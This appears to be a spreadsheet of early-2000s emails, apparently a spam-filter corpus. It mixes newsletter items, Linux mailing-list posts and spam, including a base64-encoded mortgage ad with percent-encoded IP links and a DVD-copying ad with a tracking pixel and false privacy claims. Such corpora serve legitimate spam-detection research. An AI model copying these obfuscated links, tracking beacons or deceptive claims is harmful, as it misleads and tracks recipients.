 reading up on all of this, but one thing is painfully clear. 
 The Intel 845G chipset and P4 Celeron processors really 
 don't provide an acceptable gaming experience. Not only is 
 performance subject to ridicule, but compatibility is also 
 looking to be a serious matter. Intel has never claimed that 
 Celerons were high-end desktop processors, but they have 
 typically provided a decent enough experience that they can 
 make for acceptable machines for the more budget-minded 
 consumer. The compatibility issues with this particular 
 version of Celeron and the 845G chipset are something to 
 watch out for. Once the Celeron is moved to the .13 micron 
 core, I suspect the performance concern won't remain, but 
 the 845G alone seems to have it's own problems without 
 adding the Celeron misery. The lesson in knowing what 
 hardware you're buying is what's important here.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q296133"&gt;Q296133 - WD2002: Recorded Macro to Create Right-to-Left Style Records Paragraph Alignment Incorrectly (Q296133)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292152"&gt;Q292152 - WD2002: Macro to Modify Currently Selected Text Does Not Work Correctly (Q292152)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292150"&gt;Q292150 - WD2002: Undo Command Does Not Remove List Style Link to Paragraph Style (Q292150)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292094"&gt;Q292094 - WD2002: Error Message: Microsoft Mail Local Fax Is Not Installed on Your System (Q292094)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292078"&gt;Q292078 - WD2002: New Document Created by Macro While Word Is Minimized Opens in Restored State (Q292078)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;CLEAN YOUR SYSTEM&lt;/b&gt; Add/Remove Plus! 2002 offers a new and better way 
 to uninstall programs you no longer want on your computer. All you have to do 
 is double-click on a Desktop icon called "Uninstall Programs", quickly find 
 the program you want to uninstall and click a button. Add/Remove Plus! 2002, 
 unlike the standard Windows uninstall feature (the Control Panel Add/Remove 
 Programs applet), will uninstall the program and remove it from the list. 
 &lt;a href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=36034"&gt;Get Your Copy of Add/Remove Plus Now&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;Test Drive Compaq Servers&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.testdrive.compaq.com/"&gt;http://www.testdrive.compaq.com/&lt;/a&gt;
 &lt;p&gt;Compaq (Ok, HP) offers a set of servers running various 
 *nix operating systems, as well as Oracle 9i, for test 
 drive. Just register for an account and you can tinker 
 around with Linux, FreeBSD or even Tru64 Unix running on an 
 Alpha server, but without the hassle and expense of 
 obtaining your own toys. I love the idea of having a pre-
 configured environment that lets you kick the tires without 
 causing any permanent damage. 
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Too Cool&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.pcworld.com/news/article/0,aid,102779,00.asp"&gt;http://www.pcworld.com/news/article/0,aid,102779,00.asp&lt;/a&gt;
 &lt;p&gt;This was just too interesting not to mention. Water-cooled 
 systems are all-the-rage among overclockers and those 
 that seem to need bragging rights over their friends' computer 
 systems. Hitachi is taking a chapter from that tome and 
 applying the concept where it's truly needed - notebook 
 computers. Believe me when I say that these suckers get very 
 hot. I spend half my life with notebook planted on lap, and 
 I have to put something between the two surfaces to avoid my 
 own little heat stroke. Fans and the mini water cooling 
 system Hitachi is implementing provide roughly the same heat 
 mitigation efficiency, but without the noise. The concept of 
 a water-cooled notebook sounds a little odd, but I would 
 welcome the elimination of the turbine droning with open 
 arms.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href="http://www.lockergnome.com/issues/techspecialist/20020722.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020722.html&lt;/a&gt;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</si>
  <si>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people with too much time on their hands..
 look at this first (8meg, so takes a loong time):
 http://www.ntk.net/2002/09/27/jesus_large.jpg
 and then look at this reduction:
 http://www.ntk.net/2002/09/27/jesus_small.jpg
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">You could pay a visit to your local cat sanctuary|cats home|shelter|pound and see if they have a beastie which matches your search terms (healthy + looks like Persian + good with kids); they won't charge you $ARM+LEG (probably they'll just ask for a donation) and I doubt your daughter will mind much where the cat came from.  The cat certainly won't mind, if he/she is well cared for afterwards!
 Do take the cat to a vet for a checkup and make sure it gets the proper shots, etc.  Might be a good idea to have the "snip" done too while you're there. (the cat, not you!!)  Most sanctuaries will make sure these jobs are already done but you should make sure.
 A word of warning, some cats in sanctuaries will have been mistreated in past lives and might not be good with kids, or could be quite nervous.  Bring your daughter to see the cat you've chosen to see how they react to one another.
 Ciaran (0wned by a consortium of felines)
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Suppliers of Computers, Printers, etc. &amp; Consumables 
 Central Data Supplies 
 24, Middleton Road, Banbury, Oxon, OX16 4QJ. Tel: 01295 271666 Fax 01295
 256876 
 Est 1985
 Good Afternoon,
 Please find below the pricing and specification of the laptops which
 currently have available in stock for immediate despatch.
 IBM ThinkPad 760EL Laptop Computer (Stock Ref 683)
 Intel Pentium 1 133MHz Processor
 8MB RAM
 1GB Hard Drive
 12.1' TFT Display 
 Sound &amp; Speakers
 No Modem
 No CD-ROM Drive  
 Internal 3.5' Floppy Drive    
 3 Months Warranty                      @             119
 IBM ThinkPad 765L Laptop Computer (Stock Ref 6076)
 Intel Pentium 1 166MHz Processor
 32MB RAM
 5GB Hard Drive
 13.3' TFT Display 
 Sound &amp; Speakers
 No Modem
 No CD-ROM Drive  
 Internal 3.5' Floppy Drive    
 3 Months Warranty                      @             149
 IBM ThinkPad 770 Laptop Computer (Stock Ref 4225)
 Intel Pentium 1 233MHz Processor
 32MB RAM
 5GB Hard Drive
 14.1' TFT Display 
 USB, IRDA, Sound &amp; Speakers
 Internal 56K Modem
 No CD-ROM Drive  
 Internal 3.5' Floppy Drive    
 3 Months Warranty                      @             249
 IBM ThinkPad 380 Laptop Computer (Stock Ref 7868)
 Intel Pentium 11 233MHz Processor
 32MB RAM
 4GB Hard Drive
 12.1' TFT Display 
 USB, IRDA, Sound &amp; Speakers
 No Modem
 Internal CD-ROM Drive  
 Internal 3.5' Floppy Drive    
 3 Months Warranty                      @             289
 IBM ThinkPad 770X Laptop Computer (Stock Ref 8051)
 Intel Pentium 11 300MHz Processor
 64MB RAM
 8GB Hard Drive
 14.1' TFT Display 
 USB, IRDA, Sound &amp; Speakers
 Internal 56K Modem
 External CD-ROM Drive  
 Internal 3.5' Floppy Drive    
 3 Months Warranty                      @             349
 IBM ThinkPad 770X Laptop Computer (Stock Ref 8220)
 Intel Pentium 11 233MHz Processor
 64MB RAM
 6.4GB Hard Drive
 14.1' TFT Display 
 USB, IRDA, Sound &amp; Speakers
 Internal 56K Modem
 Internal CD-ROM Drive  
 Internal 3.5' Floppy Drive    
 3 Months Warranty                      @             389
 Toshiba 7020CT Laptop Computer (Stock Ref 3111)
 Intel Pentium 11 266MHz Processor
 128MB RAM
 6GB Hard Drive
 13.3' TFT Display 
 USB, IRDA, Sound &amp; Speakers
 Internal 56K Modem  
 Docking Station Including 3.5' Floppy Drive And CD-ROM Drive  
 3 Months Warranty                      @             389
 IBM T20 Laptop Computer (Stock Ref 6062)
 Intel Pentium 111 550MHz Processor
 256MB RAM
 12GB Hard Drive
 14.1' XGA TFT Display 
 USB, IRDA, Sound &amp; Speakers
 Internal 56K Modem  
 No CD-ROM Drive
 Internal 3.5' Floppy Drive 
 3 Months Warranty                      @             549
 Dell C500 Laptop Computer (Stock Ref 7052)
 Intel Celeron 700MHz Processor
 128MB RAM
 6GB Hard Drive
 12.1' XGA TFT Display 
 USB, IRDA, Sound &amp; Speakers
 Internal 56K Modem  
 Internal CD-ROM Drive
 External 3.5' Floppy Drive 
 3 Months Warranty                      @             609
 Other specifications are available, so if the spec you require is not
 listed please do not hesitate to call our sales team on 01295 271666 for
 other models.
 If you do not wish to recieve special offer emails of this kind please
 reply with remove in the subject and you will be taken off our mailing list.
 All Prices Are Ex Vat.  
 For And On Behalf Of
 CENTRAL DATA SUPPLIES
 Peter Cutress BEng (Hons) DIS AICHEME
 Sales Manager
 E&amp;OE.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-15
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Spouses afternoon at YAPC::Europe
     posted by ziggy on Wednesday August 14, @19:44 (news)
     http://use.perl.org/article.pl?sid=02/08/14/2351255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</si>
  <si>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Mortgage Rates are Still Low...but Act SOON
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B0_58C75D0E.A4523D08
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PCEtLSBzYXZlZCBmcm9tIHVybD0oMDAyMilodHRwOi8vaW50ZXJuZXQuZS1t
 YWlsIC0tPg0KPGh0bWw+DQo8Ym9keT4NCjxwIGFsaWduPSJsZWZ0Ij48Yj48
 Zm9udCBjb2xvcj0iIzAwODAwMCIgc2l6ZT0iNiI+UmVGaW5hbmNlIGFuZCBS
 ZWR1Y2UgTW9udGhseSBQYXltZW50czwvZm9udD48L2I+PC9wPg0KPHAgYWxp
 Z249ImxlZnQiPjxmb250IHNpemU9IjUiPjxiPjxmb250IGNvbG9yPSIjMDAw
 MEZGIj5DT05TT0xJREFURSBERUJUIE9SIFJFRklOQU5DRSBZT1VSIEhPTUUh
 PC9mb250Pjxicj4NCjxmb250IGNvbG9yPSIjRkYwMDAwIj4gICAgICAgICAg
 IEF0IFRoZSBMb3dlc3QgTW9ydGdhZ2UgQ29zdCBBbmQgUmF0ZSE8L2ZvbnQ+
 PC9iPjwvZm9udD48L3A+DQo8cCBhbGlnbj0ibGVmdCI+PGI+PHNwYW4gc3R5
 bGU9ImZvbnQtZmFtaWx5OiBUaW1lcyBOZXcgUm9tYW47IG1zby1mYXJlYXN0
 LWZvbnQtZmFtaWx5OiBUaW1lcyBOZXcgUm9tYW47IG1zby1hbnNpLWxhbmd1
 YWdlOiBFTi1VUzsgbXNvLWZhcmVhc3QtbGFuZ3VhZ2U6IEVOLVVTOyBtc28t
 YmlkaS1sYW5ndWFnZTogQVItU0EiPjxmb250IHNpemU9IjQiIGNvbG9yPSIj
 MDAwMDAwIj5Zb3UgY291bGQgZ2V0IENBU0ggQkFDSyB3aXRoaW4gMjQgaG91
 cnMgb2YgYXBwcm92YWwgISE8L2ZvbnQ+PC9zcGFuPjwvYj48L3A+DQo8cCBh
 bGlnbj0ibGVmdCI+PGI+PGZvbnQgc2l6ZT0iNCI+PHNwYW4gc3R5bGU9ImZv
 bnQtZmFtaWx5OiBUaW1lcyBOZXcgUm9tYW47IG1zby1mYXJlYXN0LWZvbnQt
 ZmFtaWx5OiBUaW1lcyBOZXcgUm9tYW47IG1zby1hbnNpLWxhbmd1YWdlOiBF
 Ti1VUzsgbXNvLWZhcmVhc3QtbGFuZ3VhZ2U6IEVOLVVTOyBtc28tYmlkaS1s
 YW5ndWFnZTogQVItU0EiPjxmb250IGNvbG9yPSIjMDAwMEZGIj5OTyBPQkxJ
 R0FUSU9OPC9mb250PiAqDQo8Zm9udCBjb2xvcj0iIzAwMDBGRiI+IEZSRUUg
 Q09OU1VMVEFUSU9OPC9mb250PiAqIDxmb250IGNvbG9yPSIjMDAwMEZGIj4g
 U1RSSUNUIFBSSVZBQ1k8L2ZvbnQ+PGJyPg0KICAgICAgICAgIFNwZWNpYWwg
 UHJvZ3JhbXMgZm9yIFNlbGYtRW1wbG95ZWQgQm9ycm93ZXJzPGJyPg0KICAg
 ICAgICAgICBQcmV2aW91cyBCYW5rcnVwdGNpZXMgb3IgRm9yZWNsb3N1cmVz
 IE9LISE8L3NwYW4+PC9mb250PjwvYj48L3A+DQo8cCBhbGlnbj0ibGVmdCI+
 PGI+PGZvbnQgc2l6ZT0iNCI+PHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiBU
 aW1lcyBOZXcgUm9tYW47IG1zby1mYXJlYXN0LWZvbnQtZmFtaWx5OiBUaW1l
 cyBOZXcgUm9tYW47IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1VUzsgbXNvLWZh
 cmVhc3QtbGFuZ3VhZ2U6IEVOLVVTOyBtc28tYmlkaS1sYW5ndWFnZTogQVIt
 U0EiPldoZXRoZXIgeW91ciBjcmVkaXQgcmF0aW5nIGlzDQo8Zm9udCBjb2xv
 cj0iI0ZGMDAwMCI+IEErPC9mb250PiBvciB5b3UgYXJlICZxdW90Ozxmb250
 IGNvbG9yPSIjRkYwMDAwIj5jcmVkaXQNCmNoYWxsZW5nZWQ8L2ZvbnQ+JnF1
 b3Q7PGJyPg0KICAgICAgICAgICAgICAgIEFsbCBhcHBsaWNhdGlvbnMgd2ls
 bCBiZSBhY2NlcHRlZCE8YnI+DQogICAgICAgICAgV2UgaGF2ZSBtYW55IGxv
 YW4gcHJvZ3JhbXMgLSBvdmVyIDEwMCBsZW5kZXJzLjwvc3Bhbj48L2ZvbnQ+
 PC9iPjwvcD4NCjxwIGFsaWduPSJsZWZ0Ij48Yj48Zm9udCBzaXplPSI0Ij48
 c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IFRpbWVzIE5ldyBSb21hbjsgbXNv
 LWZhcmVhc3QtZm9udC1mYW1pbHk6IFRpbWVzIE5ldyBSb21hbjsgbXNvLWFu
 c2ktbGFuZ3VhZ2U6IEVOLVVTOyBtc28tZmFyZWFzdC1sYW5ndWFnZTogRU4t
 VVM7IG1zby1iaWRpLWxhbmd1YWdlOiBBUi1TQSI+PGZvbnQgY29sb3I9IiMw
 MDAwRkYiPlNFQ09ORCBNT1JUR0FHRVM8L2ZvbnQ+PGJyPg0KICAgICAgICAg
 ICBXZSBjYW4gaGVscCB5b3UgZ2V0IDEyNSUgb2YgeW91ciBob21lcyB2YWx1
 ZS48L3NwYW4+PC9mb250PjwvYj48L3A+DQo8cCBhbGlnbj0ibGVmdCI+PGI+
 PGZvbnQgc2l6ZT0iNCI+PHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiBUaW1l
 cyBOZXcgUm9tYW47IG1zby1mYXJlYXN0LWZvbnQtZmFtaWx5OiBUaW1lcyBO
 ZXcgUm9tYW47IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1VUzsgbXNvLWZhcmVh
 c3QtbGFuZ3VhZ2U6IEVOLVVTOyBtc28tYmlkaS1sYW5ndWFnZTogQVItU0Ei
 Pjxmb250IGNvbG9yPSIjMDAwMEZGIj5ERUJUIENPTlNPTElEQVRJT048L2Zv
 bnQ+PGJyPg0KICAgQ29tYmluZSBhbGwgeW91ciBiaWxscyBpbnRvIG9uZSwg
 YW5kIHNhdmUgbW9uZXkgZXZlcnkgbW9udGghITwvc3Bhbj48L2ZvbnQ+PC9i
 PjwvcD4NCjxwIGFsaWduPSJsZWZ0Ij48Yj48Zm9udCBzaXplPSI0Ij48c3Bh
 biBzdHlsZT0iZm9udC1mYW1pbHk6IFRpbWVzIE5ldyBSb21hbjsgbXNvLWZh
 cmVhc3QtZm9udC1mYW1pbHk6IFRpbWVzIE5ldyBSb21hbjsgbXNvLWFuc2kt
 bGFuZ3VhZ2U6IEVOLVVTOyBtc28tZmFyZWFzdC1sYW5ndWFnZTogRU4tVVM7
 IG1zby1iaWRpLWxhbmd1YWdlOiBBUi1TQSI+PGZvbnQgY29sb3I9IiMwMDAw
 RkYiPlJFRklOQU5DSU5HPC9mb250Pjxicj4NCiAgICAgICAgUmVkdWNlIHlv
 dXIgbW9udGhseSBwYXltZW50cyBhbmQgR2V0IENhc2ggQmFjazwvc3Bhbj48
 L2ZvbnQ+PC9iPjwvcD4NCjxwIGFsaWduPSJsZWZ0Ij48Yj48Zm9udCBzaXpl
 PSI0IiBjb2xvcj0iI0ZGMDAwMCI+PHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5
 OiBUaW1lcyBOZXcgUm9tYW47IG1zby1mYXJlYXN0LWZvbnQtZmFtaWx5OiBU
 aW1lcyBOZXcgUm9tYW47IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1VUzsgbXNv
 LWZhcmVhc3QtbGFuZ3VhZ2U6IEVOLVVTOyBtc28tYmlkaS1sYW5ndWFnZTog
 QVItU0EiPldlIGhhdmUgcHJvZ3JhbXMgZm9yIEVWRVJZIGNyZWRpdCBzaXR1
 YXRpb24uPC9zcGFuPjwvZm9udD48L2I+PC9wPg0KPHAgYWxpZ249ImxlZnQi
 PjxhIGhyZWY9Imh0dHA6Ly84JTMxJTJFJTM5LiUzOC4lMzQlMkYlNEVldyU0
 Q28lNjFuT3AlNzAlNkZydCU3NW5pdCU2OSU2NXMiPjxmb250IHNpemU9IjUi
 IGNvbG9yPSIjMDA4MDAwIj48Yj5GUkVFLVFVT1RFPC9iPjwvZm9udD48L2E+
 PC9wPg0KPHAgYWxpZ249ImxlZnQiPiZuYnNwOzwvcD4NCjxwIGFsaWduPSJs
 ZWZ0Ij48c3BhbiBzdHlsZT0iZm9udC1zaXplOjEyLjBwdDttc28tYmlkaS1m
 b250LXNpemU6MTAuMHB0O2ZvbnQtZmFtaWx5OiZxdW90O1RpbWVzIE5ldyBS
 b21hbiZxdW90OzsNCm1zby1mYXJlYXN0LWZvbnQtZmFtaWx5OiZxdW90O1Rp
 bWVzIE5ldyBSb21hbiZxdW90Ozttc28tYW5zaS1sYW5ndWFnZTpFTi1VUztt
 c28tZmFyZWFzdC1sYW5ndWFnZToNCkVOLVVTO21zby1iaWRpLWxhbmd1YWdl
 OkFSLVNBIj48Yj48YSBocmVmPSJodHRwOi8vJTM4JTMxLjkuOCUyRSUzNCUy
 RkxpJTczdCU0RnAlNzQlNEYlNzUlNzQlMkYiPlRvIGJlIHRha2VuIG9mZiB0
 aGUgbGlzdC48L2E+PC9iPjwvc3Bhbj48L3A+DQoNCjwvYm9keT4NCg0KPC9o
 dG1sPg0KDQoNCjY5NTdVQU9QNy03OTZVU1VkNzA1MEdHQkE0LTM5OVprbUw0
 MDUyTnNkYTgtbDQx
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt;&gt; Why would spam be likely to end up with two instances of Return-Path
 &gt;&gt; in the headers?
 [Greg Ward]
 &gt; Possibly another qmail-ism from Bruce Guenter's spam collection.
 Doesn't seem *likely*, as it appeared in about 900 of about 14,000 spams.
 It could be specific to one of his bait addresses, though -- don't know.  A
 nice thing about a statistical inferencer is that you really don't have to
 know why a thing works, just whether it works &lt;wink&gt;.
 &gt; Or maybe Anthony's right about spammers being stupid and blindly copying
 &gt; headers. (Well, of course he's right about spammers being stupid; it's
 &gt; just this particular aspect of stupidity that's open to question.)
 I'm going to blow it off -- it's just another instance of being pointlessly
 baffled by a mixed corpus half of which I don't know enough about.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Random hack Q: drawing on CDs with lasers?
</t>
  </si>
  <si>
    <t xml:space="preserve">O utensils of the world --
 I wonder if it is possible to reverse-engineer the Reed-Solomon 
 error-correcting codes to create a bytestream such that, when burned 
 onto a CD, you can make out a picture in the diffraction pattern?
 I suppose this is a modern equivalent to line-printer artwork; I was 
 imagining using a CD-RW drive to use the outer track, say, to spell out 
 the disc title, creation time, etc. It would sure beat feeding CDs 
 through a laser printer :-)
 Rohit
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------103227703017104
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 Friend,Now you can copy DVD's and Games
 http://www.terra.es/personal9/iop1008/
 BACKUP DVD VIDEO's WITH YOUR CD-R BURNER
 With 321 studio's software, you can now copy
 any DVD and Playstation Game.  Never buy another 
 backup DVD movie again.  Just copy it!
 This is the first time this software is being made
 available to the public. All the software you need 
 to burn your own DVD Video, is included in 321 Studio's 
 software package DVD Copy Plus!  The movies will play 
 in a standard DVD player. With detailed, easy to follow, 
 step-by-step instructions, you can BURN your own DVD 
 Video using nothing more than your DVD-ROM 
 and CD-R drives. Purchase a copy! Click below.
 http://www.terra.es/personal9/iop1008/
 Order today and receive!
 *Step by Step Interactive Instructions
 *All Software Tools Included On CD
 *No DVD Burner Required
 *FREE Live Technical Support
 *30 Day Risk Free Trial Available
 With DVD Copy Plus you can backup Your DVD Movies with 
 the same 74min or 80min CD-R's you've used in the past 
 to create audio CD's. Our software compresses the large 
 DVD files on your standard DVD to VCD, SVCD, and DivX 
 much the same way the popular MP3 format compresses audio.  
 Order today and start burning
 http://www.terra.es/personal9/iop1008/
 Thank You,
 CopymyDVD
 http://inglesa.net/unsub.php?client=atomicDOT
 We take your privacy very seriously and it is our policy never to send
 unwanted email messages. This message has been sent to zzzz@example.com
 because you originally joined one of our member sites or you signed up
 with a party that has contracted with atomicDOT. Please
 http://tilw.net/unsub.php?client=atomicDOT&amp;msgid=17090200005
 to Unsubscribe (replying to this email WILL NOT unsubscribe you). 
 TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8;
 --------------103227703017104
 Content-Type: text/html; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Backup your DVD's&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 6.00.2600.0" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;DIV&gt;&lt;/DIV&gt;
 &lt;BLOCKQUOTE 
 style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV&gt;&lt;/DIV&gt;
   &lt;TABLE cellSpacing=0 cellPadding=0 width=525 align=center bgColor=#ffffff 
   border=0&gt;
     &lt;TBODY&gt; 
     &lt;TR&gt; 
       &lt;TD width="33"&gt;&lt;IMG height=1 src="images/spacer.gif" width=33 border=0&gt;&lt;/TD&gt;
       &lt;TD width="174"&gt;&lt;IMG height=1 src="images/spacer.gif" width=174 border=0&gt;&lt;/TD&gt;
       &lt;TD width="360"&gt;&lt;IMG height=1 src="images/spacer.gif" width=360 border=0&gt;&lt;/TD&gt;
       &lt;TD width="33"&gt;&lt;IMG height=1 src="images/spacer.gif" width=33 border=0&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD colSpan=4&gt;&lt;a href="http://www.terra.es/personal9/iop1008/"&gt;&lt;IMG height=253 src="http://www.terra.es/personal9/iop1008/images/mailer8_r1_c1.gif" 
         width=600 useMap=#Map border=0&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD background=http://www.terra.es/personal9/iop1008/images/mailer8_r2_c1.gif height=181&gt;&lt;/TD&gt;
       &lt;TD vAlign=top align=left colSpan=2 height=181&gt; 
         &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;With DVDCopyPlus 
           and PowerCDR5.0 you can copy and burn your&lt;/FONT&gt;&lt;/P&gt;
         &lt;UL&gt;
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;DVD Movies&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Playstation &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;MP3s, AVIs and all 
             other multimedia Files&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Software, Music 
             CDs (perfect RAW data duplication)&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;NEW! Burn to CD-R 
             or DVD-R&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;
         &lt;/UL&gt;
         &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Protect your 
           investments by backing up your CD, DVD, MP3, Data and Game collections 
           with burned copies that really work! Separately, DVDCopyPlus and PowerCDR5.0 
           are over $100 worth of software that you can purchase bundled right 
           now for just $49.99!&lt;/FONT&gt;&lt;/P&gt;
         &lt;P align=center&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
         size=2&gt;&lt;B&gt;&lt;FONT size=5&gt;THAT'S 50% OFF!&lt;BR&gt;
           &lt;/FONT&gt;&lt;A 
         href="http://www.terra.es/personal9/iop1008/"&gt;MORE DETAILS&lt;/A&gt; &lt;A 
         href="http://www.terra.es/personal9/iop1008/"&gt;ORDER NOW&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;/TD&gt;
       &lt;TD background=http://www.terra.es/personal9/iop1008/images/mailer8_r2_c4.gif height=181&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD colSpan=4&gt;&lt;IMG height=24 src="http://www.terra.es/personal9/iop1008/images/mailer8_r3_c1.gif" 
         width=600 border=0 name=mailer8_r3_c1&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD height="18"&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;/TBODY&gt; 
   &lt;/TABLE&gt;
   &lt;MAP name=Map&gt;&lt;AREA shape=POLY 
     coords=244,119,270,129,280,114,297,125,318,113,327,129,355,120,352,133,385,131,381,140,398,145,398,152,405,151,397,160,383,165,409,172,381,180,404,193,384,195,382,207,384,212,364,210,351,213,353,224,327,216,317,230,297,219,278,232,269,218,243,225,238,210,211,210,209,202,199,193,216,180,186,172,216,164,192,151,195,143,211,136,211,132,231,135,243,130,243,121 
     href="http://www.terra.es/personal9/iop1005/"&gt;&lt;/MAP&gt;&lt;FONT 
   face=Verdana,Geneva,Arial,Helvetica,sans-serif color=#000000 size=1&gt;
   &lt;P&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/BLOCKQUOTE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;&lt;font size="1" face="Arial"&gt;We take your privacy very seriously and it is our policy never to send unwanted email messages.  This message has been sent to zzzz@example.com because you originally joined one of our member sites or you signed up with a party that has contracted with atomicDOT.  Please &lt;a href="http://tilw.net/unsub.php?client=atomicDOT&amp;msgid=17090200005" TARGET="_blank"&gt;Click Here&lt;/a&gt;&lt;/font&gt; to Unsubscribe  &lt;font size="1" face="Arial"&gt;(replying to this email WILL NOT unsubscribe you).  &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;&gt;
 &lt;/body&gt;&lt;/html&gt;&lt;br&gt;&lt;br&gt;
 &lt;img src="http://tilw.net/counter.php?client=atomicDOT&amp;email=zzzz@example.com&amp;msgid=17090200005" width="1" height="1" border="0" alt=""&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size="-5"&gt;TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8;&lt;/font&gt;
 --------------103227703017104--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-31 at 06:34, John Hinsley wrote:
 &gt; First, thanks for all the rpms, and especially ogle (which comes very close to 
